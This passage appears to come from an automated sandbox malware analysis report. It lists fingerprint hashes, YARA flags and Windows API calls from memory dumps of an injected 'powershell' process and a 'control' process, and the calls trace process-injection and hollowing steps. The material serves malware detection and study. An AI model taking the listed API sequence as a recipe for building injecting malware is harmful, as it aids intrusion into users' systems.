                                                          • Instruction Fuzzy Hash: 97410930618B498FDB64EF19D888BAAB7F1FBD8301F50492DE48AC3255CB34D945CB42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInformationProcessRemoteThread
                                                          • String ID:
                                                          • API String ID: 3020566308-0
                                                          • Opcode ID: fbb9c8f312b893b60839ba48e8bc4ddd40b20ddac33ad9c4b23783b4827f991b
                                                          • Instruction ID: 97e1c1a6b7b406f90ff6f4c9e2f69cbb8742e4384f45be5d67988e0967530d1a
                                                          • Opcode Fuzzy Hash: fbb9c8f312b893b60839ba48e8bc4ddd40b20ddac33ad9c4b23783b4827f991b
                                                          • Instruction Fuzzy Hash: 5451523061CB098FEF64EF6CD8897AA77F1EBA9301F00452DE94AC3291DE35D8458752
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Control-flow graph of the function at 2174f3e5b80 (node/edge list omitted). API calls on the graph: NtCreateSection. Internal calls: 2174f3e10cc, 2174f3e8b90.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Section$CreateView
                                                          • String ID: 0
                                                          • API String ID: 1585966358-4108050209
                                                          • Opcode ID: 40bb1598f9154bb559e81318fc058f53894861c0a25be57b6af6ff67e1b9a0e8
                                                          • Instruction ID: bea54dae6c51707c0795a5047922981faefbde23f8179380f5ef126bb2fa4ebc
                                                          • Opcode Fuzzy Hash: 40bb1598f9154bb559e81318fc058f53894861c0a25be57b6af6ff67e1b9a0e8
                                                          • Instruction Fuzzy Hash: 55717F7061CA098FEB94EF1CD4897A677F1FBA8301F10456EE84AC7265EB34D941CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Control-flow graph of the function at 2174f3fb948 (node/edge list omitted). API calls on the graph: CreateMutexExA. Internal calls: 2174f3e10cc, 2174f3db404, 2174f3fdb0a, 2174f3d83bc, 2174f3e98fc, 2174f3ddccc, 2174f3e3de4, 2174f3e1164, 2174f3f9700, 2174f3e2a8c, 2174f3fe4a4, 2174f3d415c, 2174f3e341c, 2174f3d1cc4, 2174f3e374c, 2174f3f353c, 2174f3e56d0, 2174f3d62ec, 2174f3f7e04, 2174f3fd734, 2174f3dd9f4, 2174f3f2754.
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$MutexQueueThreadUser
                                                          • String ID:
                                                          • API String ID: 1097034428-0
                                                          • Opcode ID: bd03c217eebf3514f0dc141ef06a426e4807aa03d6b913fdaf265373ad3cc355
                                                          • Instruction ID: 6f797e3d4e9062a2cd2301aa0854f2e53238cf7e668eb094ec54bff764b02a0b
                                                          • Opcode Fuzzy Hash: bd03c217eebf3514f0dc141ef06a426e4807aa03d6b913fdaf265373ad3cc355
                                                          • Instruction Fuzzy Hash: 7872857161CA488FEB58EF68EC896A977F1F7A8700F10452ED44BC32A1DE34D945CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateHeap
                                                          • String ID:
                                                          • API String ID: 10892065-0
                                                          • Opcode ID: b79121b0bf9300899778867a254ee6e6f699830a218d847d70ca451a66ee4414
                                                          • Instruction ID: 592b41a0d8b8b953e5ef6db01a3161e8f27817cec4e5e291d1fededfae86c6e0
                                                          • Opcode Fuzzy Hash: b79121b0bf9300899778867a254ee6e6f699830a218d847d70ca451a66ee4414
                                                          • Instruction Fuzzy Hash: 1491837061CB498FEB58EF2CD8497AA33F5FBE4315F14456AD44AC32A1EE78D8018B51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Control-flow graph of the function at 2174f3ee860 (node/edge list omitted). API calls on the graph: NtQueryInformationProcess. No internal calls.
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: 1a5ec96146b37ae29432bfa8ac23ac72cbb7241fa644212a0b5fd835a5577e33
                                                          • Instruction ID: a4cfcb4775e6a41beb9f06f150db369d2065f58708021514fc05fdc3587e4488
                                                          • Opcode Fuzzy Hash: 1a5ec96146b37ae29432bfa8ac23ac72cbb7241fa644212a0b5fd835a5577e33
                                                          • Instruction Fuzzy Hash: 77014B30218A098FEB94EF6CD8C8BA573F5FBE8705F51056EA41AC71A4E728D881CB01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SectionView
                                                          • String ID:
                                                          • API String ID: 1323581903-0
                                                          • Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                          • Instruction ID: bd16dfacf422c9013890673db0dbbee5032dfee46da9d6cc651ddda1fb71c3cd
                                                          • Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                          • Instruction Fuzzy Hash: 1701D6B0A08B048FCB48DF69D0C8569BBE1FB58311F10066FE949C7796DB70D885CB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MemoryVirtualWrite
                                                          • String ID:
                                                          • API String ID: 3527976591-0
                                                          • Opcode ID: 3c8ab56f3603755e988b26635f94d5e2d310067f79c5e42d2b82552f2c8fabb7
                                                          • Instruction ID: 88b0eed7a5b1beeab9697fa470a6fb554649f90174812bd2a08006dbcd98b034
                                                          • Opcode Fuzzy Hash: 3c8ab56f3603755e988b26635f94d5e2d310067f79c5e42d2b82552f2c8fabb7
                                                          • Instruction Fuzzy Hash: 0DE09274B18A458FE7006BB8C8CC3B873F0FB98305F500839F885C73A0C629C8404282
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateValue
                                                          • String ID: ($(
                                                          • API String ID: 2259555733-222463766
                                                          • Opcode ID: 15c0657e6459d840dfd1ed2d718bab6897b6f36c0ec807a258d29cf25e484d4a
                                                          • Instruction ID: 42df46906e255fa3863b1b74c1ef916dafc701ed99d0ee8f59b5a9c86a58e1de
                                                          • Opcode Fuzzy Hash: 15c0657e6459d840dfd1ed2d718bab6897b6f36c0ec807a258d29cf25e484d4a
                                                          • Instruction Fuzzy Hash: 6A316C3061CA088FE764EF18E8597A6B7F5FBA8305F50052DE84AC32A1DB789946CB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Control-flow graph of the function at 2174f3f99d0 (node/edge list omitted). API calls on the graph: CreateFileA, SetFilePointer, ReadFile. Internal calls: 2174f3e4050, 2174f3ea140.
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CreatePointerRead
                                                          • String ID:
                                                          • API String ID: 2103328899-0
                                                          • Opcode ID: 71d59c8fd03c1f47d27e273b6030a364b82ed69c839053eddebff289bcd6d591
                                                          • Instruction ID: 835b54217e913c08985fbd09c7840536894df8d16d99dae7d99de2e28da6df75
                                                          • Opcode Fuzzy Hash: 71d59c8fd03c1f47d27e273b6030a364b82ed69c839053eddebff289bcd6d591
                                                          • Instruction Fuzzy Hash: 9C41A23021CA084FDB58DF2CDCC866977F1FB98318F25866DD19AC72A2DA79D8428791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Thread$ResumeSuspend
                                                          • String ID:
                                                          • API String ID: 3472746266-0
                                                          • Opcode ID: ffbd531617e9de6398172a96c7478380edc2f1a6ff7c6ff8001d704803e1d92c
                                                          • Instruction ID: 22024c34e128909b300d30a710de138f9f6c0c257b4dc63240da1819d691180d
                                                          • Opcode Fuzzy Hash: ffbd531617e9de6398172a96c7478380edc2f1a6ff7c6ff8001d704803e1d92c
                                                          • Instruction Fuzzy Hash: B471313061CA484BEB98EB1CE8497EA73F5FBE8305F50452DE58AC3291DE34D945CB46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          [Control-flow graph not reproduced; API calls shown in the graph: CreateThread, QueueUserAPC]
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateQueueThreadUser
                                                          • String ID:
                                                          • API String ID: 3600083758-0
                                                          • Opcode ID: 36f65ecab13cfc995b4b55937e947feb4e6208ee9d24dec18057a5403e22070c
                                                          • Instruction ID: b2c49f9e2415e5d778a26ae5fe5cf4013d4eeb17b3d9b3065595d8a058f232a0
                                                          • Opcode Fuzzy Hash: 36f65ecab13cfc995b4b55937e947feb4e6208ee9d24dec18057a5403e22070c
                                                          • Instruction Fuzzy Hash: D5012930718A094FEBA4EF6D984D63976F2EBA8351B24457AA419C3270DF78DC428B81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ContinueHandlerVectored
                                                          • String ID:
                                                          • API String ID: 3758255415-0
                                                          • Opcode ID: 5cfdce6ba604bbcc091d7b921d4918bbcddbfb62c8266db36f703a1fb59b6e8d
                                                          • Instruction ID: 5822ac98c732554e4598e61431cd52c24f5623b6090a11f0085ebb9e0613ac76
                                                          • Opcode Fuzzy Hash: 5cfdce6ba604bbcc091d7b921d4918bbcddbfb62c8266db36f703a1fb59b6e8d
                                                          • Instruction Fuzzy Hash: AE51983160CA0A8FFF65EF2895583BA77F2EBE8351F14453E9456C32A1DE78C5468B02
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          [Control-flow graph not reproduced; API calls shown in the graph: RegQueryValueExA]
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: QueryValue
                                                          • String ID:
                                                          • API String ID: 3660427363-0
                                                          • Opcode ID: 1f6ad6994c92080283db70fc4a04c579610f830166e95bdc93f203490e1fbcbe
                                                          • Instruction ID: 2e1a8d12cff1d92a0e6e35d7a6170c76fb5d7baf153bb6d0250d90f775090af6
                                                          • Opcode Fuzzy Hash: 1f6ad6994c92080283db70fc4a04c579610f830166e95bdc93f203490e1fbcbe
                                                          • Instruction Fuzzy Hash: 7B319C3060CB088FEB58EF18D4896A6B3E0FBA8301F11452EE84EC7255DB34E8408B82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateValue
                                                          • String ID:
                                                          • API String ID: 2259555733-0
                                                          • Opcode ID: 535672abe70d0168ee810ee176c23215db19a3ba1e8f58e6fcab72b62e0214ff
                                                          • Instruction ID: e28f92274439f2333f853763aacf18633fc3a7bbf6bf8cce19df32c8e683b562
                                                          • Opcode Fuzzy Hash: 535672abe70d0168ee810ee176c23215db19a3ba1e8f58e6fcab72b62e0214ff
                                                          • Instruction Fuzzy Hash: 7221E37061C74C8FE784EF68D458B9AB7F1FBE8345F400929A48AC3251EB74D540CB42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          [Control-flow graph not reproduced; API calls shown in the graph: RegCreateKeyA]
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: 3a96c24ec20924aeac69af3be795014768ecc2de191383b8bce9cd8f3f8db1b1
                                                          • Instruction ID: 99058cac7fef9eae682e9ad92b594ba0fa9aea1048e5cb602531b48d490d1ab0
                                                          • Opcode Fuzzy Hash: 3a96c24ec20924aeac69af3be795014768ecc2de191383b8bce9cd8f3f8db1b1
                                                          • Instruction Fuzzy Hash: 4711613061CA198FEB54DB5CD48876ABBF5EBEC341F14052EE88DC32A0DA74C9458742
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Executed Functions

                                                          Control-flow Graph

                                                          [Control-flow graph not reproduced; API calls shown in the graph: NtUnmapViewOfSection, NtClose, NtSetContextThread]
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 9e26852af833edec412c0de11438924e430ff278851e67a344344114f521d1d2
                                                          • Instruction ID: 1c6296f2d7a291b06cc6a180511e1df46bcaf58469597c892d3e8f101a42d2f8
                                                          • Opcode Fuzzy Hash: 9e26852af833edec412c0de11438924e430ff278851e67a344344114f521d1d2
                                                          • Instruction Fuzzy Hash: A6124330718E498FDBA9EF28D895BAA73E1FB58301F40452EE44AC3255DF34E9458B85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          [Control-flow graph not reproduced; API calls shown in the graph: NtQueryInformationToken (twice), NtClose]
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationQueryToken$Close
                                                          • String ID: 0
                                                          • API String ID: 459398573-4108050209
                                                          • Opcode ID: b00bdbe5e76e8574fbf38c79017efbcac25b001069e063d358994e26018d4f43
                                                          • Instruction ID: 8e6d536ea4e02b18a4c9fc035cab7e167f1465354542ef92c80d09b45fa7bfa5
                                                          • Opcode Fuzzy Hash: b00bdbe5e76e8574fbf38c79017efbcac25b001069e063d358994e26018d4f43
                                                          • Instruction Fuzzy Hash: 3B311934218B898FD764EF19D884BAAB7E2FB98301F50493EE48AC3255CB349945CB42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          [Control-flow graph not reproduced; API calls shown in the graph: NtSetInformationProcess, CreateRemoteThread, ResumeThread, FindCloseChangeNotification]
                                                          APIs
                                                          • NtSetInformationProcess.NTDLL ref: 000DA9BA
                                                          • CreateRemoteThread.KERNELBASE ref: 000DAA6A
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInformationProcessRemoteThread
                                                          • String ID:
                                                          • API String ID: 3020566308-0
                                                          • Opcode ID: e809e7a55289bdd76e4c287ffba4728d9b536dc639f5e193fe49f29cd2f94f97
                                                          • Instruction ID: db80d7ab1eba394077b56d7b27a5c9655ce27bbdf420c805b10eafc0d5db6a34
                                                          • Opcode Fuzzy Hash: e809e7a55289bdd76e4c287ffba4728d9b536dc639f5e193fe49f29cd2f94f97
                                                          • Instruction Fuzzy Hash: 3E51B330718B058FEB64EF28D89966A77E1EB9A301F00452EE94AC3351EF35D845CB53
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          [Control-flow graph not reproduced; API calls shown in the graph: CreateMutexExA, GetUserNameA]
                                                          APIs
                                                          • CreateMutexExA.KERNEL32 ref: 000DBA13
                                                          • GetUserNameA.ADVAPI32 ref: 000DBCBF
                                                            • Part of subcall function 000B1CC4: CreateThread.KERNELBASE ref: 000B1CF4
                                                            • Part of subcall function 000B1CC4: QueueUserAPC.KERNELBASE ref: 000B1D0B
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateUser$MutexNameQueueThread
                                                          • String ID:
                                                          • API String ID: 2503873790-0
                                                          • Opcode ID: bd03c217eebf3514f0dc141ef06a426e4807aa03d6b913fdaf265373ad3cc355
                                                          • Instruction ID: d4cef62b5e1f39e8bd6fc26486a850ad9d6c79fc0169e1a1817f0a1686a2c117
                                                          • Opcode Fuzzy Hash: bd03c217eebf3514f0dc141ef06a426e4807aa03d6b913fdaf265373ad3cc355
                                                          • Instruction Fuzzy Hash: F862A471618B488FE758EF68EC85AA977E1F758700F10452FD48BC3262DE38D946CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          [Control-flow graph not reproduced; API calls shown in the graph: NtCreateSection]
                                                          APIs
                                                          • NtCreateSection.NTDLL ref: 000C5D22
                                                            • Part of subcall function 000C8B90: NtMapViewOfSection.NTDLL ref: 000C8BDC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Section$CreateView
                                                          • String ID: 0
                                                          • API String ID: 1585966358-4108050209
                                                          • Opcode ID: 40bb1598f9154bb559e81318fc058f53894861c0a25be57b6af6ff67e1b9a0e8
                                                          • Instruction ID: de137444d667847429bb5b19ea5a704764b7dda53f31df986373f3d9e10dc3e4
                                                          • Opcode Fuzzy Hash: 40bb1598f9154bb559e81318fc058f53894861c0a25be57b6af6ff67e1b9a0e8
                                                          • Instruction Fuzzy Hash: DD61A67061CF098FDB64EF18D889B6977E1FBA8301F10456EE84AC7265DB34E941CB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          [Control-flow graph not reproduced; API calls shown in the graph: NtAllocateVirtualMemory]
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL ref: 000BFCE5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID: @
                                                          • API String ID: 2167126740-2766056989
                                                          • Opcode ID: 7156798f28e224d12ba43a52bf34910b9fbde10ea3a108692921d49310c2351a
                                                          • Instruction ID: 2f844c0e4fcf1a1fd44552f11012fdddc53b3b23eeb017693951de13c3224b64
                                                          • Opcode Fuzzy Hash: 7156798f28e224d12ba43a52bf34910b9fbde10ea3a108692921d49310c2351a
                                                          • Instruction Fuzzy Hash: 56F09070615A048BDB44DFA8D8CD6B977E0F758305F90096DE51ACB254DB788948C745
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (graph not reproduced)
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL ref: 000EF27A
                                                          • NtProtectVirtualMemory.NTDLL ref: 000EF309
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755718156.00000000000EF000.00000040.00020000.sdmp, Offset: 000EF000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_ef000_control.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 657d0230eb3c5e11ffdc8c28530785ca78267f022dac7e4fb701294f8bc7cf9e
                                                          • Instruction ID: 2c1d682e74678751625dbce91645c8815f9cc760a0225ce2f875abf3def0cac4
                                                          • Opcode Fuzzy Hash: 657d0230eb3c5e11ffdc8c28530785ca78267f022dac7e4fb701294f8bc7cf9e
                                                          • Instruction Fuzzy Hash: 68A1F23120CBC98FC765DF29D8856B9B7E1FB96300F5849BED0CBC7252D634A9468742
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (graph not reproduced)
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL ref: 000DD13B
                                                          • NtQueryInformationProcess.NTDLL ref: 000DD185
                                                            • Part of subcall function 000B4580: NtReadVirtualMemory.NTDLL ref: 000B459F
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeapInformationMemoryProcessQueryReadVirtual
                                                          • String ID:
                                                          • API String ID: 886377554-0
                                                          • Opcode ID: 7538145d463cbd389560cfa1eca2a20c3f42fc5358184b3495427114d91d50a0
                                                          • Instruction ID: f7df56eb027547f72a28ed68ce29be77e8c752cf5d088f6e211a63a1d5a0b270
                                                          • Opcode Fuzzy Hash: 7538145d463cbd389560cfa1eca2a20c3f42fc5358184b3495427114d91d50a0
                                                          • Instruction Fuzzy Hash: 64515330618B488BDB59EB28E8857AA73E5FB98341F04452FE84EC3246EF34DD45C796
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateHeap
                                                          • String ID:
                                                          • API String ID: 10892065-0
                                                          • Opcode ID: b79121b0bf9300899778867a254ee6e6f699830a218d847d70ca451a66ee4414
                                                          • Instruction ID: f2761454506913d27003a9400cdceca0c66fd8aaed2b1be7685eb078831b5b29
                                                          • Opcode Fuzzy Hash: b79121b0bf9300899778867a254ee6e6f699830a218d847d70ca451a66ee4414
                                                          • Instruction Fuzzy Hash: 5C81A230618B498FE758EF68EC8976A33E5FB98315F15453EE44AC3261EF78D8428B41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: c772d9d63cc4f3cf214e68fa05504b1b36572458740193c2b27b3804a6b0d157
                                                          • Instruction ID: 5bdce21a249d8ba52bf29982604c857489102928dcb3f76ee5e0070e5c72c9b8
                                                          • Opcode Fuzzy Hash: c772d9d63cc4f3cf214e68fa05504b1b36572458740193c2b27b3804a6b0d157
                                                          • Instruction Fuzzy Hash: FF314F30718B058BE758EF7CD898666B7F2EBD9301F04893EA505C7264DB39E9448B51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 000CE886
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: 1a5ec96146b37ae29432bfa8ac23ac72cbb7241fa644212a0b5fd835a5577e33
                                                          • Instruction ID: 908c58438c442a2933d4298d96599fa7bfcb212c9bf145d686fbb0f812c42670
                                                          • Opcode Fuzzy Hash: 1a5ec96146b37ae29432bfa8ac23ac72cbb7241fa644212a0b5fd835a5577e33
                                                          • Instruction Fuzzy Hash: 8F018130318E4D8FAB94EF68D8C4E6973E5FBA8305B50056EA40EC7164DB38D885CB01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SectionView
                                                          • String ID:
                                                          • API String ID: 1323581903-0
                                                          • Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                          • Instruction ID: c5c51738017296730dd2ba60ec1415bc6697badd7048af22074d08cfebbc504e
                                                          • Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                          • Instruction Fuzzy Hash: 2501D2B0A08B048FCB48EF69D0C8969BBE1FB58311B10467FE949CB796DB70D885CB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtWriteVirtualMemory.NTDLL ref: 000C196F
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MemoryVirtualWrite
                                                          • String ID:
